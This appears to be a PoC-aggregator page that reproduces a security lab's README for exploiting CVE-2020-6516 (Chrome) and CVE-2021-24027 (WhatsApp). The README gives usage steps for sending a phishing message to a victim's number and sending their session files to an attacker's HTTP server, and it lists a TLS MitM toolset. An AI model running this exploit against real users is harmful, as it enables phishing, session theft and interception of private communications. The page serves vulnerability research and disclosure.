关联漏洞
标题:
Facebook WhatsApp 安全漏洞
(CVE-2021-24027)
描述:Facebook WhatsApp是美国Facebook公司的一套利用网络传送短信的移动应用程序。该应用程序通过智能手机中的联络人信息,查找使用该软件的联络人传送文字、图片等。WhatsApp Business是WhatsApp的商用版。 WhatsApp for Android v2.21.4.18 and WhatsApp Business for Android v2.21.4.18 存在安全漏洞,该漏洞允许第三方访问设备的外部存储来读取缓存的TLS材料。
描述
PoC and tools for exploiting CVE-2020-6516 (Chrome) and CVE-2021-24027 (WhatsApp)
介绍
# WhatsApp MitD & MitM
## Introduction
This repository contains PoC code and tools that were developed as part of our
research [01] on remotely exploiting *Man-in-the-Disk* (MitD) vulnerabilities on
WhatsApp for Android. As discussed in our blog post, the code and accompanying
scripts found here, were used to exploit CVE-2020-6516 (Chrome) [02] and
CVE-2021-24027 (WhatsApp) [03].
The structure of this repository is as follows:
* The current directory contains the Python tool that hooks WhatsApp using Frida,
sends the phishing message carrying the CORS bypass payload and runs an HTTP
server, where exfiltrated session files from the victim device are sent to.
* **tls12\_psk\_extract/** contains the TLS v1.2 MitM toolset. See **README.md**
in that directory for more information on how to prepare a MitM environment.
* **watls\_psk\_extract/** contains the TLS v1.3 (WaTLS) MitM toolset. See
**README.md** in that directory for more information on how to prepare a MitM
environment.
* **openssl-1.1.1f-patches/** contains OpenSSL 1.1.1f patches required for
setting up TLS v1.2 and/or TLS v1.3 MitM environments.
* **secrets/** holds a simple shell script and an OpenSSL configuration for
generating certificates similar to those used by the WhatsApp TLS v1.3
infrastructure. The generated keys and certificates can be used for both
TLS v1.2 and v1.3 MitM.
* Last but not least, **misc/** contains various Frida scripts that were used
for testing and debugging purposes during our research and might be helpful to
other researchers.
## Usage
To test the PoC you need an Android device running WhatsApp 2.20.206.22 [04].
Even though our code was initially developed for 2.19.355, and so you can find
the corresponding snippets under **frida_scripts/**, that version is nowadays
considered "expired" and won't work.
Before firing up the PoC, it is a good idea to compile as little as possible of
WhatsApp's DEX code. Doing so might proactively help in avoiding issues like
Frida not being able to hook specific methods.
adb shell
am force-stop com.whatsapp
pm compile -f -m space com.whatsapp
am start com.whatsapp/.Main
Download Frida server and push it on your Android device under **/data/local/tmp**,
leaving the default file name as is. Version 12.8.10 is tested and known to work
well. Feel free to download a more recent one if you prefer to. The PoC will
automatically detect the Frida server binary and will attempt to execute it with
the appropriate command line arguments.
cd /tmp
curl -O https://github.com/frida/frida/releases/download/12.8.10/frida-server-12.8.10-android-arm64.xz
xz -d frida-server-12.8.10-android-arm64.xz
adb push frida-server-12.8.10-android-arm64 /data/local/tmp
The main logic of the exploit is implemented in **main.py**. Files **adb.py**
and **frida_util.py** are trimmed down versions of tools that we use internally
for various debugging tasks on Android devices.
To run the PoC, attach your Android device on your computer and run the
following command:
python3 main.py -s ANDROID_SERIAL -a 192.168.1.100 -p 8000 -r \
images/the_guardian.jpg MOBILE_NUMBER@s.whatsapp.net "Rush for Mediterranean gas"
The command line switches passed to **main.py** are the following:
* `-s` - The serial number of the Android device to use, in case the attacker
has multiple Android devices attached on her computer.
* `-a` and `-p` - Address and port, respectively, of the HTTP server where the
exfiltrated sessions will be sent to.
* `-r` - Instructs **main.py** to start the aforementioned HTTP server on the
local computer. If you don't pass `-r`, make sure you run **server.py** on the
host specified by `-a` and `-p`.
Positional arguments are the following:
* **images/guardian.jpg** - A JPG image that will be used as a fake message
preview, in order to lure the victim into clicking on it.
* **MOBILE_NUMBER@s.whatsapp.net** - The victim's mobile phone number in WhatsApp
format. This is usually the country prefix followed by the mobile number. For
example, Greek numbers (+30) look like `301234567890@s.whatsapp.net`.
* **"Rush for Mediterranean gas"** - An arbitrary string to be used as the
message caption.
For a real life usage example, have a look at our blog post, and more specifically
at the demonstration videos.
## References
[01] <https://www.census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/>
[02] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516>
[03] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24027>
[04] <https://www.apkmirror.com/apk/whatsapp-inc/whatsapp/whatsapp-2-20-206-22-release/whatsapp-messenger-2-20-206-22-android-apk-download/>
文件快照
[4.0K] /data/pocs/b29b2f958701fb2401d4cb3fd7aff47fe4223988
├── [1.9K] adb.py
├── [ 111] common.py
├── [4.0K] exploit
│ └── [6.2K] exploit.html
├── [4.0K] frida_scripts
│ ├── [ 820] README.md
│ ├── [ 545] version.js
│ ├── [4.0K] whatsapp-2.19.355
│ │ ├── [3.7K] expire.js
│ │ └── [5.7K] phish.js
│ └── [4.0K] whatsapp-2.20.206.22
│ └── [5.7K] phish.js
├── [ 12K] frida_util.py
├── [4.0K] images
│ └── [ 19K] the_guardian.jpg
├── [ 970] logger.py
├── [4.0K] main.py
├── [4.0K] misc
│ ├── [ 141] dump_hprof.js
│ ├── [1.6K] README.md
│ ├── [4.0K] whatsapp-2.19.355
│ │ ├── [2.9K] extssl_download.js
│ │ ├── [3.2K] sniff.js
│ │ ├── [3.4K] watls_download.js
│ │ └── [2.9K] watls_unzip_trigger.js
│ ├── [4.0K] whatsapp-2.20.200.22
│ │ ├── [2.9K] extssl_download.js
│ │ └── [3.2K] sniff.js
│ └── [4.0K] whatsapp-2.20.206.22
│ ├── [2.9K] extssl_download.js
│ ├── [3.2K] sniff.js
│ ├── [3.9K] watls_download.js
│ └── [2.9K] watls_unzip_trigger.js
├── [4.0K] openssl-1.1.1f-patches
│ ├── [4.0K] tls12-mitm.diff
│ └── [3.4K] watls-mitm.diff
├── [4.7K] README.md
├── [4.0K] secrets
│ ├── [ 476] cert.conf
│ └── [ 225] gen_certs.sh
├── [2.1K] server.py
├── [4.0K] tls12_psk_extract
│ ├── [2.7K] boringssl_session.cpp
│ ├── [ 426] convert_session.sh
│ ├── [4.0K] key_extractor_payload
│ │ ├── [4.0K] key_extractor
│ │ │ ├── [ 225] axolotl.proto
│ │ │ ├── [6.2K] KeyExtractor.java
│ │ │ ├── [ 704] Logger.java
│ │ │ ├── [1.1K] Main.java
│ │ │ └── [ 802] Makefile
│ │ ├── [ 205] Makefile
│ │ ├── [1.1K] Makefile.config
│ │ ├── [ 348] README.md
│ │ └── [4.0K] stub
│ │ ├── [ 452] create_zip.sh
│ │ ├── [ 89] dex.h
│ │ ├── [ 132] dex.S
│ │ ├── [ 510] log.c
│ │ ├── [ 172] log.h
│ │ ├── [ 670] Makefile
│ │ ├── [7.5K] stub.c
│ │ └── [ 208] stub.h
│ ├── [ 976] Makefile
│ ├── [ 10K] openssl_http_pipe.py
│ ├── [6.3K] openssl_session.c
│ ├── [4.0K] payload
│ │ ├── [ 505] create_zip.sh
│ │ ├── [ 201] libwhatsapp.c
│ │ ├── [ 330] Makefile
│ │ └── [ 437] README.md
│ ├── [4.1K] README.md
│ └── [8.6K] run_server.sh
└── [4.0K] watls_psk_extract
├── [ 933] Makefile
├── [3.1K] README.md
├── [5.7K] ReflectionAPI.java
├── [2.5K] run_server.sh
├── [ 235] run.sh
└── [4.9K] WatlsPskExtract.java
17 directories, 63 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。